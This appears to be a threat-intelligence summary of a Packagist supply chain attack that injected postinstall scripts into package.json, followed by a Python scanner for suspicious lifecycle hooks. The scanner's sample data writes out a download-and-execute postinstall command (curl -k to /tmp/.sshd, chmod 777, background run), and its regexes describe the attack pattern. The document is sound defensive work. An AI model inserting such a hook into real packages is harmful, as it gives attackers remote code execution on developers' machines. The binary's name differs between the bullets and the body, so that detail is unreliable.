Essential Insights
- A coordinated supply chain attack compromised eight PHP and JavaScript packages on Packagist by injecting malicious code into package.json files, leading to the execution of a Linux binary from GitHub.
- The malicious script downloads and executes a binary named "gvfsd-network" from GitHub, which disables TLS verification, suppresses errors, and runs in the background, enabling remote code execution.
- The attacker spread the payload across 777 GitHub files, including workflow scripts, indicating a broad campaign leveraging various mechanisms for persistence and payload execution.
Threat, Techniques, and Targets
A recent supply chain attack affected eight packages on Packagist. The attacker inserted malicious code into the packages' package.json files, designed to run a Linux binary fetched from a GitHub Releases URL. The attack targeted projects that use JavaScript build tools alongside PHP code, hiding the code in packages that developers might overlook. Rather than modifying composer.json, the attacker chose package.json, changing the upstream repositories to add a postinstall script. This script downloads a Linux binary named “systemd-network-helper” from GitHub, saves it to “/tmp/.sshd”, sets permissions so that everyone can execute it, and then runs it in the background. The attack is coordinated and appears to be part of a larger campaign: files on GitHub also reference the malware payload, the targeted set of repositories was broad, and multiple methods were used to run the malicious code.
Impact, Security Implications, and Remediation Guidance
The malicious activity can cause serious security issues. The downloaded binary could execute remote commands or install additional malware. This can lead to compromises of affected environments. The activity also suggests that attackers can hide malicious code within libraries used in software projects. Because the payload’s exact functionality is unclear and the relevant GitHub account no longer exists, understanding the full impact is difficult. Blocking the malicious code is advised to prevent compromise. Developers and security teams should consult with their vendors or relevant authorities for specific remediation steps. It is important to remove affected packages and review project dependencies carefully. Regular updates, monitoring for unusual activity, and verifying package sources can help prevent future attacks.
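To make the dependency review described above concrete, the following added example (not code from the original report) scans package.json files for npm lifecycle hooks whose command shows the pattern this campaign used: a remote download, a drop into /tmp, chmod, backgrounding, TLS checks disabled and error suppression. The sample package.json inside it is constructed to mirror that description and uses placeholder GitHub names; the indicator set and the two-indicator threshold are the author's choices, not a published rule.

```python
import json
import re
from pathlib import Path

# Lifecycle hooks that npm/yarn run automatically during install.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators modelled on the behaviour described on this page.
INDICATORS = {
    "remote_download": re.compile(r"\b(curl|wget)\b|https?://"),
    "github_release_url": re.compile(r"github\.com/[^\s'\"]+/releases/download/"),
    "drop_to_tmp": re.compile(r"/tmp/\.?\w+"),            # e.g. /tmp/.sshd
    "make_executable": re.compile(r"chmod\s+(\+x|[0-7]*7[0-7]*)"),  # +x or an rwx mode
    "background_exec": re.compile(r"(&\s*$|\bnohup\b|\bsetsid\b)"),
    "tls_disabled": re.compile(r"(?:^|\s)-k\b|--insecure|--no-check-certificate|NODE_TLS_REJECT_UNAUTHORIZED=0"),
    "errors_suppressed": re.compile(r">\s*/dev/null|\|\|\s*true"),
}

def scan_package_json(text: str) -> list[dict]:
    """Return one finding per lifecycle script that trips two or more indicators."""
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))
        if len(hits) >= 2:
            findings.append({"hook": hook, "command": cmd, "indicators": hits})
    return findings

def scan_tree(root: str) -> list[dict]:
    """Walk a checkout or node_modules tree and scan every package.json it contains."""
    results = []
    for path in Path(root).rglob("package.json"):
        for f in scan_package_json(path.read_text(encoding="utf-8", errors="replace")):
            results.append({"path": str(path), **f})
    return results

# Constructed sample (placeholder org/repo), modelled on the postinstall described above.
MALICIOUS_SAMPLE = json.dumps({
    "name": "example-build-helper",
    "scripts": {
        "build": "webpack --mode production",
        "postinstall": "curl -s -k -o /tmp/.sshd https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/releases/download/v1/helper && chmod 777 /tmp/.sshd && /tmp/.sshd >/dev/null 2>&1 &",
    },
})
# Constructed benign sample: a postinstall that only runs a local build step.
BENIGN_SAMPLE = json.dumps({"name": "ok", "scripts": {"postinstall": "node scripts/build-native.js", "build": "tsc"}})

if __name__ == "__main__":
    for finding in scan_package_json(MALICIOUS_SAMPLE):
        print(finding["hook"], finding["indicators"])
```

Run `scan_tree(".")` against a project checkout after `npm install` to review both first-party and vendored package.json files; matches are leads for manual review, not proof of compromise.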
ThreatIntel-V1
